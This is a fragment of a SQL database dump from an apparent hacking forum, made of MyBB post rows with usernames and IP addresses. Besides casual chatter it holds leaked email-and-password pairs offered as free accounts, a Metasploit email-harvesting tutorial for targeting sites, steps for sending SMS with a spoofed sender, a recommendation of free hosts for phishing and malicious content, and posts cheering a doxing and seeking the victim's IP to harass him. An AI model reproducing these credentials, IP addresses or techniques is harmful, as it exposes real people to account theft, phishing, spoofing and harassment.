'??zg???g????61', '1350606238', '--_____--\" No. Just no...', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8619779cd2770288f9f0a1f2f7d4b540', '0', '0'); INSERT INTO mybb_posts VALUES('5494', '982', '5489', '7', 'RE: GREED', '0', '222', 'Exposé', '1350606282', 'Yes greed is already banned lol....and yeh I think he scammed ....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1a2aa0786a2b224384ce9cae5859d8cc', '0', '0'); INSERT INTO mybb_posts VALUES('5495', '983', '0', '47', 'MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350606401', 'HEY L33T I\'V GOT TWO MC PREMIUM ACCOUNTS TO GIVE AWAY \nRULES: Do not change the password\nhere they are:\n1. theophile78@hotmail.fr:120697TC\n2. thijs.bastiaens@hotmail.com:148818\nthere they are i could of put some stupid as survey but no i didn\'t \nhave fun with them :)', '203.104.11.11', '-882373877', '1', '0', '257', '1350606425', '1', '244c86fb53d8418f8eec295552813f53', '0', '1350606425'); INSERT INTO mybb_posts VALUES('5496', '982', '5494', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350606492', '[quote=\'ƒ???????????g\' pid=\'5494\' dateline=\'1350606282\']\r\nYes greed is already banned lol....and yeh I think he scammed ....\r\n[/quote]\r\n\r\nyeah what a dog, who would do that to one another :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'f7ab046d7e9b4dedcac85a02d45c3c43', '0', '0'); INSERT INTO mybb_posts VALUES('5497', '982', '5496', '7', 'RE: GREED', '0', '100', '??zg???g????61', '1350606529', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5496\' dateline=\'1350606492\']\r\n[quote=\'ƒ???????????g\' pid=\'5494\' dateline=\'1350606282\']\r\nYes greed is already banned lol....and yeh I think he scammed ....\r\n[/quote]\r\n\r\nyeah what a dog, who would do that to one another :)\r\n[/quote]\r\n\r\nGreed would XD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8288c9815559afe6dea3d22f18746bc1', '0', '0'); INSERT INTO mybb_posts VALUES('5498', '982', '5489', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350606880', 'yeah hahah greedy fuck \nXD', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '22c73e9e585dab6c9bd230d1dc5dbb00', '0', '0'); INSERT INTO mybb_posts VALUES('5499', '896', '4892', '23', 'RE: How to secure your Router', '0', '222', 'Exposé', '1350608178', 'Lmao I could still hack your router but k...:P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a3c30670c22a05ae09ccf31f522c9c41', '0', '0'); INSERT INTO mybb_posts VALUES('5500', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '222', 'Exposé', '1350608209', 'fuck windows updates....god its soooooo annoying when it comes up', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '238a5439c556ce515b17da503dd91efb', '0', '0'); INSERT INTO mybb_posts VALUES('5501', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '222', 'Exposé', '1350608349', 'Nice tutorial found it to be very interesting :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a3b0362e92f3ab970773b082500fd1e8', '0', '0'); INSERT INTO mybb_posts VALUES('5502', '896', '4892', '23', 'RE: How to secure your Router', '0', '257', 'XxTREYZxX', '1350608710', 'thanks for the great tut. i really enjoyed it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '06fd9a833dabc0f2c404afcc6fec1f9d', '0', '0'); INSERT INTO mybb_posts VALUES('5503', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '1', 't3h jok3r', '1350608814', 'Welcome to L33T Hacking. Feel free to check out our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] if you have any questions about the site.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a26c1b2967fb1743a1c8b14354b5af76', '0', '0'); INSERT INTO mybb_posts VALUES('5504', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '257', 'XxTREYZxX', '1350608837', 'could i please have a different please the other wasn\'t my style :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8e546384d87815a7e6cce878d6e50002', '0', '0'); INSERT INTO mybb_posts VALUES('5505', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '257', 'XxTREYZxX', '1350609109', 'thanks for the share appreciated :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'a52f221bc1f646b1eeb17b921ceec898', '0', '0'); INSERT INTO mybb_posts VALUES('5506', '982', '5489', '7', 'RE: GREED', '0', '1', 't3h jok3r', '1350609293', 'Well I\'m closing this thread because I don\'t want people to make fun of him or do name calling. We banned him because he couldn\'t provide any proof, maybe he was not guilty and he was telling the truth that he was infected with a RAT.\n\nAlso, please fix your spelling and grammar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e40c75ac33ef31a406b5f6ea77f7bfdb', '0', '0'); INSERT INTO mybb_posts VALUES('5507', '973', '5454', '19', 'RE: New HF Logo?', '0', '1', 't3h jok3r', '1350609406', 'Yo for the first 4-6 seconds I thought you wanted me to make that LHs logo but then when I read your title again I was like oh lol.\n\nIt\'s kinda disgusting but the truth always hurts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9db4896422b725eda4db2d79243e887f', '0', '0'); INSERT INTO mybb_posts VALUES('5508', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '1', 't3h jok3r', '1350609639', 'I\'m not going to discuss my security settings out here. I told you once about the hosting and I hate repeating, next time I would recommend you to post in the right section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f194455bfb1dbc8146dc3463cd036ffd', '0', '0'); INSERT INTO mybb_posts VALUES('5509', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '1', 't3h jok3r', '1350609931', 'Nice list, x10hosting and freehostia are good for hosting malicious content for free.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f65761b6a3f08f7ac33f3f0fc69d5530', '0', '0'); INSERT INTO mybb_posts VALUES('5510', '936', '5391', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '1', 't3h jok3r', '1350609964', '[quote=\'iTzIpod\' pid=\'5391\' dateline=\'1350593653\']\r\nSeems legit.\r\nWill check it out.\r\n\r\nWhich one is the best? In your opinion?\r\n[/quote]\r\n\r\nThe best is my favorite one which is made by jim467.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf87b88484a64282d94774ce47a8eb0c', '0', '0'); INSERT INTO mybb_posts VALUES('5511', '958', '5387', '73', 'RE: subway surfers', '0', '1', 't3h jok3r', '1350610028', 'Thanks for the cheats, I play this game almost every night. \n\nIt\'s similar to temple run but I find TR better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '225714f4b90b75e8c3514f42c573def5', '0', '0'); INSERT INTO mybb_posts VALUES('5512', '973', '5454', '19', 'RE: New HF Logo?', '0', '222', 'Exposé', '1350610141', 'Let\'s try not to spam in the general section. I thought this was going to be a real logo too. Please post this shit somewhere else thanks', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a02e7f48196c3102fa3081e831644e6a', '0', '0'); INSERT INTO mybb_posts VALUES('5513', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '1', 't3h jok3r', '1350610148', 'Damn they both are good. I like both of them, I think Android is better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8101bc5f9361a48f0bb61b553808bdf', '0', '0'); INSERT INTO mybb_posts VALUES('5514', '972', '5453', '16', 'RE: Social Engineering Package', '0', '1', 't3h jok3r', '1350610256', 'Advices by Defcon are really useful and thanks for the list and pic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '29a312c5feb5ef59fbc377443000e20c', '0', '0'); INSERT INTO mybb_posts VALUES('5515', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '228', 'VirtualLegend', '1350611121', 'Your a Awesome Member Keep it Up !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '59c8d75ff79c2f6b221a204f2f192807', '0', '0'); INSERT INTO mybb_posts VALUES('5516', '983', '5515', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350611166', '[quote=\'VirtualLegend\' pid=\'5515\' dateline=\'1350611121\']\r\nYour a Awesome Member Keep it Up !!!\r\n[/quote]\r\n\r\nthanks you hope you enjoy :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '6ccd02633e646f21115a0e0fff334a89', '0', '0'); INSERT INTO mybb_posts VALUES('5517', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350612028', 'Nooooo 3 is very ugly. Iv\'e seen it before on another forum...ewwww. I\'d say let\'s go with 1 :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '59f129e39ea312482d1a0a786d6b2c4a', '0', '0'); INSERT INTO mybb_posts VALUES('5518', '889', '4842', '3', 'RE: Vote for a new theme', '0', '257', 'XxTREYZxX', '1350612455', 'i defiantly choose 1 but can we work on the award system after this :)', '203.104.11.11', '-882373877', '1', '0', '1', '1350613165', '1', 'd74a759e998a00c8c2c5ba74868cf390', '0', '1350613165'); INSERT INTO mybb_posts VALUES('5519', '945', '5288', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350612739', 'http://pastebin.com/Vpy0GQtC', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '94ee5d95c8e8e19bf4d37c2a87cecdff', '0', '0'); INSERT INTO mybb_posts VALUES('5520', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '1', 't3h jok3r', '1350613030', 'Facebook even tracks too much information.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25d0872407d4f9c8350a5c1e04dafe4f', '0', '0'); INSERT INTO mybb_posts VALUES('5523', '975', '5521', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350613327', '[quote=\'t3h jok3r\' pid=\'5521\' dateline=\'1350613149\']\r\n[quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\']\r\nuse this \r\n\r\n[code]\r\n[img]pic link goes here[/img]\r\n[/code]\r\n[/quote]\r\n\r\nWorks for me too, I checked your account and it works.\r\n[/quote]\r\n\r\nyeah its all better now thanks for your support\r\ni will be closing thread to prevent spam', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'cc055ea5fed2e5531ae7353467ab0869', '0', '0'); INSERT INTO mybb_posts VALUES('5521', '975', '5458', '7', 'RE: how do i insert a pic', '0', '1', 't3h jok3r', '1350613149', '[quote=\'R?????zo?\' pid=\'5458\' dateline=\'1350596919\']\r\nuse this \r\n\r\n[code]\r\n[img]pic link goes here[/img]\r\n[/code]\r\n[/quote]\r\n\r\nWorks for me too, I checked your account and it works.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7ec66695486ea6b4a616e80ce9f743f', '0', '0'); INSERT INTO mybb_posts VALUES('5522', '907', '5388', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350613156', '[quote=\'iTzIpod\' pid=\'5388\' dateline=\'1350593476\']\r\nI actually saw a couple of these on Youtube already.\r\n[/quote]\r\n\r\nYea but mines was uploaded before yesterday.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'a2cdf4399351db472f542c0f16b46c8c', '0', '0'); INSERT INTO mybb_posts VALUES('5524', '889', '4842', '3', 'RE: Vote for a new theme', '0', '3', '??????????¢™', '1350614856', 'I cant wait till theme 1 is ready for us to use.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'a23f761fb30bc15dcef09be2ac18432a', '0', '0'); INSERT INTO mybb_posts VALUES('5525', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '82', 'iTzIpod', '1350616951', 'Really?\n\nYou.. Not knowing any of these websites.\nLol\nShould search more GFX Forums on Google or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b2c128cc130167bba5daa7683a00879c', '0', '0'); INSERT INTO mybb_posts VALUES('5526', '889', '4842', '3', 'RE: Vote for a new theme', '0', '2', 'Apathy', '1350617464', 'I like 1 alot. Now that I have seen it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'e6a335b5b61fbbb7498518a00ef1e5a8', '0', '0'); INSERT INTO mybb_posts VALUES('5527', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '2', 'Apathy', '1350617582', 'Not bad. I like someone else footage better though.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '433061927b4fc96b0352d0df0a32301b', '0', '0'); INSERT INTO mybb_posts VALUES('5528', '907', '5527', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350619527', '[quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\']\r\nNot bad. I like someone else footage better though.\r\n[/quote]\r\n\r\nThats okay with me, I didnt do a pro edit because im not an editor just a gamer.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', '51e2bae20fdb7aebe947fb9e6d0a2506', '0', '0'); INSERT INTO mybb_posts VALUES('5529', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '205', 'mothered', '1350620394', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5329\' dateline=\'1350553535\']\r\ngangnam style is so boss who agrees \r\neverybody now \r\nop op op op op gangnam style , sexy ladies haah lol\r\ni saw him live at the x factor lol he such a funny dancer\r\n[/quote]\r\n\r\nI just can\'t get this out of my head. It\'s so catchy.\r\n\r\nI just missed out on tickets, was hoping to go to the X Factor, but saw It on Channel 7 anyway.\r\nHow was the live performance? Did It rock the house down?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '226cdc3d8dc048c3b0e66b6d990c98b0', '0', '0'); INSERT INTO mybb_posts VALUES('5530', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '205', 'mothered', '1350620653', 'Brilliant work mate!!\r\n\r\nHis life Is more or less over now.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1736249cd1170b87de1e6483a612bebe', '0', '0'); INSERT INTO mybb_posts VALUES('5531', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '205', 'mothered', '1350620727', 'Welcome aboard mate.\r\n\r\nEnjoy your stay :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0bfb0d1a06b8d57f02da3afd03710a99', '0', '0'); INSERT INTO mybb_posts VALUES('5532', '872', '5500', '24', 'RE: Windows Updates, who uses It?', '0', '205', 'mothered', '1350620861', '[quote=\'ƒ???????????g\' pid=\'5500\' dateline=\'1350608209\']\r\nfuck windows updates....god its soooooo annoying when it comes up\r\n[/quote]\r\n\r\nNow that\'s good to read.\r\n\r\nI can show you multiple ways, to \"securely\" disable It, or even better, get rid of It altogether so It never pops up again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6df67a113301ec0f2d95680e466efa4b', '0', '0'); INSERT INTO mybb_posts VALUES('5533', '984', '0', '7', 'What size pizza can you eat?', '0', '205', 'mothered', '1350621080', 'Greetings LH,\r\n\r\nSo, a simple question, what size pizza can you eat? \r\n\r\nI have a few friends (yes I do!!), and they share a \"medium\" size pizza between them both (couples). My goodness, I\'d eat the cardboard with It. I always have a large, but when I\'m really hungry (when my stomach Is stuck to my spine), I can eat a \"family size\"\r\n\r\nHow about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e52d60340cc6320047e17238cf2381bb', '0', '0'); INSERT INTO mybb_posts VALUES('5534', '985', '0', '7', 'World\'s Longest Email Address', '0', '205', 'mothered', '1350621213', 'Hey guys,\r\n\r\nHere\'s a site whereby you can create a really long email address. Whether you do It for a laugh, or just to annoy someone, It\'s certainly quite cool.\r\n\r\nLink: http://www.abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com/', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'af63c874035db66b595c4a1f626331ff', '0', '0'); INSERT INTO mybb_posts VALUES('5535', '986', '0', '24', 'What VM do you use and why?', '0', '205', 'mothered', '1350621475', 'Greetz to all,\r\n\r\nOkay, the commonality between most users, Is to utilize a Virtual Machine for files suspected of malicious content. \r\n\r\nMy usage: To test various Operating Systems, and to also verify If a given CD key Is In fact valid.\r\nPreferred VM: Yeah, I know VMWare Workstation Is the pick of the crop, but I like Virtual PC 2007, simply for It\'s user-friendliness, being free of any costs, and overall functionality. \r\n\r\nYou guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1eaa65ffcd090cdf307baf445466514b', '0', '0'); INSERT INTO mybb_posts VALUES('5536', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '3', '??????????¢™', '1350621657', 'LOL that is some dope shit, If someone were to use it people would be like wtf.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'd5f8b951ed5e0b60eb0fa5ed983a004e', '0', '0'); INSERT INTO mybb_posts VALUES('5537', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350621838', 'I need new userbars, can someone look for new dark userbars? \n\nI guess Theme 1 wins then. Keep voting and once again I need new userbars.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '481c156a161a8a816d48a66561c7925b', '0', '0'); INSERT INTO mybb_posts VALUES('5538', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '222', 'Exposé', '1350621847', 'Haha Im so gonna signup lmao....this is hilarious', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c19d1f95d81beaa50d83564808402739', '0', '0'); INSERT INTO mybb_posts VALUES('5539', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '222', 'Exposé', '1350621916', 'I can usually eat like 5 slices or so before im full. But if i\'m really hungry I can have like a large pizza :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ee6b77d3d6b313ebbff679b9bb9df5f5', '0', '0'); INSERT INTO mybb_posts VALUES('5540', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350624447', 'Yeh I\'ll look to see if I can find some. We need a new logo too right?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '338be9a55e571846b7de367f0326c46a', '0', '0'); INSERT INTO mybb_posts VALUES('5541', '889', '5540', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350624686', '[quote=\'ƒ???????????g\' pid=\'5540\' dateline=\'1350624447\']\r\nYeh I\'ll look to see if I can find some. We need a new logo too right?\r\n[/quote]\r\n\r\nYup but I thought there\'s no need to repeat the obvious. We need a logo too but that will only be handled when the theme becomes public.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4a373dcb85cd64ccffa33ea8a8a9e32b', '0', '0'); INSERT INTO mybb_posts VALUES('5542', '987', '0', '13', '[TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350630128', 'When hacking a site or company u need to gather as much information about them as possible which includes their emails so this will be helpful to some :cool:\r\n\r\nLets start!!\r\n\r\nStep 1: http://metasploit.com/download/ Download metasploit here . Choose minimal setup .\r\n\r\nAfter installing the metasploit , Open Metasploit Console.\r\n\r\nNow type the following command\r\n\r\n\r\n[code]use auxiliary/gather/search_email_collector[/code]\r\n\r\n\r\nThen Type\r\n\r\n\r\n[code]set DOMAIN target.com[/code]\r\n\r\n\r\nRemember to replace target.com with your target website u wish to harvest the emails of .\r\n\r\nNow type\r\n\r\n\r\n[code]exploit[/code]\r\n\r\n\r\nThat will then tell the console to execute the command and exploit search engines for finding emails\r\nIt will automatically search through Google , Big and Yahoo and get you all the mail address assigned to your target domain :\r\n\r\n[IMG]http://3.bp.blogspot.com/-5Ng2WkTciUQ/TfSK48f-CXI/AAAAAAAAAZQ/yXnC5ioEhl8/s1600/metasploit+auxillary+module+email+harvesting.PNG[/IMG]\r\n\r\nWell that\'s all Thank you for reading and any questions just leave them in the posts below :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6ade8b4f811fe562ee2186fad7b49994', '0', '0'); INSERT INTO mybb_posts VALUES('5543', '988', '0', '12', '[TUT] Watch +18 Youtube Videos Without an Account', '0', '258', 'PiXEL^OG', '1350630423', '[align=center]Today im gonna show you how to bypass +18 filter that Youtube has in a few simple steps\r\n\r\nStep 1\r\n\r\nOn the video you want to view, get the video code from the URL.\r\n\r\n\r\nhttp://www.youtube.com/watch?v=O07u7KdRVo0\r\n\r\n\r\nO07u7KdRVo0 would be the video code in this case.\r\n\r\nStep 2\r\n\r\n\r\nNow add the video code to the following link:\r\n\r\nhttp://www.youtube.com/v/VIDEO CODE HERE?fs=1&amp\r\n\r\n\r\nSo basically remove \"VIDEO CODE HERE\" in the previous link and replace it with the video code , it would then look like this :\r\n\r\nhttp://www.youtube.com/v/O07u7KdRVo0?fs=1&\r\n\r\nStep 3\r\n\r\nNow, go to that link and you will be able to view it without logging in or being over 18.\r\n\r\nDont be beech and say thank you in the comments below if this helped :) [/align]', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '34bb877e2abdac6c72ff1e6832ff3340', '0', '0'); INSERT INTO mybb_posts VALUES('5544', '989', '0', '68', 'Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '258', 'PiXEL^OG', '1350630514', 'Today ive got something special for you guys :)\r\n\r\nWith this script you can make your own web proxy browsing site just like Hidemyass or Hideme.ru\r\n\r\nIts called Glype proxy , its a open source proxy script with many features like : cookies , Admin panel , Themes , IP ban system , Tons of user-agents (you can also use your custom user agent) and a bunch of other stuff im too lazy to list it all\r\n\r\nYou can download this awesome script from their official website : http://www.glype.com/\r\n\r\nBasically just upload it to your FTP , go to admin.php and choose username and password and your all done :)\r\n\r\nRequirements :\r\n\r\n-Paid hosting\r\n-Good bandwidth on web hosting account\r\n-cURL and PHP5 Enabled on server\r\n\r\nNOTE!! : If you are using Free hosting like 000webhost , X10 hosting or BinHoster then THEY WILL DELETE YOUR WEBSITE within 10 days because proxy scripts are not allowed on any free host , THIS SCRIPT WORKS BEST WITH PAID HOSTING!!\r\n\r\nWell that\'s about it , Say thank you if you liked this to keep the thread alive and yeah have fun with it', '139.190.235.246', '-1950422026', '0', '0', '258', '1350630552', '1', 'cc2d3145eb7780a842da8215cadd127d', '0', '1350630552'); INSERT INTO mybb_posts VALUES('5545', '990', '0', '12', 'How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '258', 'PiXEL^OG', '1350630641', 'Wazzup guys its Deltaforce bringing you guys a new awesome post on How to send free anonymous SMS to your friends mobile phone from you\'re PC....hope it helps Tongue\r\n\r\nAnd before you ask yes this site allows you to send anonymous text messages from anywhere in the world to anywhere in the world!!!!\r\n\r\nJust follow these easy steps...\r\n\r\n1. Go to http://SMSGlobal.com and register for an account.\r\n\r\nSMSGlobal allows you to send 25 SMS by default. If you want to send 100 more SMS, enter “WPRESS” (without quotes) in “Promo code” field. Thus, using this promo code, you can send a total of 125 SMS.\r\n\r\nfor new promo codes go to this link : http://www.retailmenot.com/view/smsglobal.com\r\n\r\nNote: You don’t have to fill and “Affiliate code” field. Leave it blank.\r\n\r\n2. You will get a text message informing you about the password. Use this password to login to your account.\r\n\r\n3. Hit on “Send SMS to Number”\r\n\r\n[IMG]http://1.bp.blogspot.com/-oH3RhADFFKI/Tn9UY48MucI/AAAAAAAAAEg/ST1PUVTi2O8/s1600/How-to-send-fake-sms-to-friend.jpg[/IMG]\r\n\r\n4. Enter the details as follows:\r\n\r\nSend SMS To: Your friend’s number whom you want to send fake SMS.\r\nSender ID From: The number from whom the SMS will appear to be sent. The number to be spoofed. Replace your number with any other number.\r\nMessage: Type your message content.\r\n\r\nYou can leave other fields untouched.\r\n\r\nNote: For Indian friends, make sure you add “91? before sender and receiver numbers. This is a necessary for efficient working of this hack.\r\n\r\n5. Now, hit on “Send SMS” button and your friend will receive the fake SMS which you have sent. Cheers!!!\r\n\r\nNote: Do not misuse this mobile hack as it can put you in problems. Use it for fun!!!\r\n\r\nUpdate: SMSGlobal supports almost all countries and their network providers. You can make sure that your country and network provider is supported using this link.\r\n\r\nSo this was a short tutorial on how to send fake SMS to your friends. I have tried this service with many of my friends and it has worked perfectly for me\r\n\r\nSay thank you in the comments below :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'f1ea2e7457fcbd36f64e46ac8e5c8a77', '0', '0'); INSERT INTO mybb_posts VALUES('5546', '889', '4842', '3', 'RE: Vote for a new theme', '0', '258', 'PiXEL^OG', '1350630779', 'I like the current theme the most <3 please don\'t change it', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '1ed8396fa06b23122a8b80fb8d9c27f2', '0', '0'); INSERT INTO mybb_posts VALUES('5547', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '258', 'PiXEL^OG', '1350630893', 'I usually order a large pizza at pizza hut with a coke , a huge sallad and some garlic bread', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '73041a429600b4b10449f3f4136074b7', '0', '0'); INSERT INTO mybb_posts VALUES('5548', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '258', 'PiXEL^OG', '1350631058', 'I don\'t see the point in it , this can\'t annoy anyone people just copy and paste so its not like someone\'s gonna bother reading all that\n\nThough u can troll people with it..', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '66dcfb0702bb575291e02c72e3cc2544', '0', '0'); INSERT INTO mybb_posts VALUES('5549', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '258', 'PiXEL^OG', '1350631135', 'Hi there , welcome to LH Enjoy your stay :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8d681e3cffd9e5a67c845c65285949e9', '0', '0'); INSERT INTO mybb_posts VALUES('5550', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '258', 'PiXEL^OG', '1350631543', 'It would have been better if someone had his IP , then we could really fuck with him , anyone up for the job?', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8be2a3ee8b77fa6da779d4cfb5324982', '0', '0'); INSERT INTO mybb_posts VALUES('5551', '973', '5454', '19', 'RE: New HF Logo?', '0', '258', 'PiXEL^OG', '1350631823', 'I reported this for Adult content , Don\'t post shit like this again , its against LH rules', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ded609fd6ed63e1db8c9bfbb4b31998d', '0', '0'); INSERT INTO mybb_posts VALUES('5552', '973', '5454', '19', 'RE: New HF Logo?', '0', '62', 'R?????zo?', '1350632273', 'Yes I thought it was going to be a real logo aswell.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '38eb20c1f69e7f6ca8f20ebb0a8dc687', '0', '0'); INSERT INTO mybb_posts VALUES('5553', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '62', 'R?????zo?', '1350632345', 'Welcome to the commumity, and enjoy your stay.\nStay active and HQ :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '3ddbad44a0af724b70835a6677539465', '0', '0'); INSERT INTO mybb_posts VALUES('5554', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '62', 'R?????zo?', '1350632999', 'Hahah I\'ve heard of this before but I never thought of actually using it haha\nLike doing buisness, \'whats your paypal?\'\nHere you go: \'hauabaf@abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com\' haha', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '210e6a0cc8fb8c89c1e992bb7a980841', '0', '0'); INSERT INTO mybb_posts VALUES('5555', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '62', 'R?????zo?', '1350633125', 'Large for the win!\nBut only if I\'m really hungry :P', '77.54.39.106', '1295394666', '1', '0', '62', '1350633146', '1', '77569e5f2d2ffc7156aac9913ad93b7b', '0', '1350633146'); INSERT INTO mybb_posts VALUES('5556', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '62', 'R?????zo?', '1350633231', 'Thanks for this, I was looking for something like this or a while :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'fbf7b1928cfa73290d7a0e376375ce1f', '0', '0'); INSERT INTO mybb_posts VALUES('5557', '889', '4842', '3', 'RE: Vote for a new theme', '0', '62', 'R?????zo?', '1350633356', 'Seems like theme 1 wins, but I really like the current one we have :(', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '376befeadc8b3cd72886dc11ad489995', '0', '0'); INSERT INTO mybb_posts VALUES('5558', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350633465', 'He was a fucking boss! Like always!', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '9b5fee54057b623da57d8d3c6a430d75', '0', '0'); INSERT INTO mybb_posts VALUES('5559', '972', '5453', '16', 'RE: Social Engineering Package', '0', '62', 'R?????zo?', '1350633583', 'Yeah It looked interesting that\'s why I share it with my SE brothers :)', '77.54.39.106', '1295394666', '1', '0', '62', '1350633623', '1', '5511133629948d01d81cbfc5607cb758', '0', '1350633623'); INSERT INTO mybb_posts VALUES('5560', '971', '5492', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350633759', '[quote=\'??zg???g????61\' pid=\'5492\' dateline=\'1350605918\']\r\nDamn thanks a ton Reload, your threads are always HQ (:\r\n[/quote]\r\n\r\n\r\nThanks bro, that kinda comments keeps me motivated :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '51d501f593125df1ef96d68fb7fab85b', '0', '0'); INSERT INTO mybb_posts VALUES('5561', '957', '5386', '9', 'RE: | 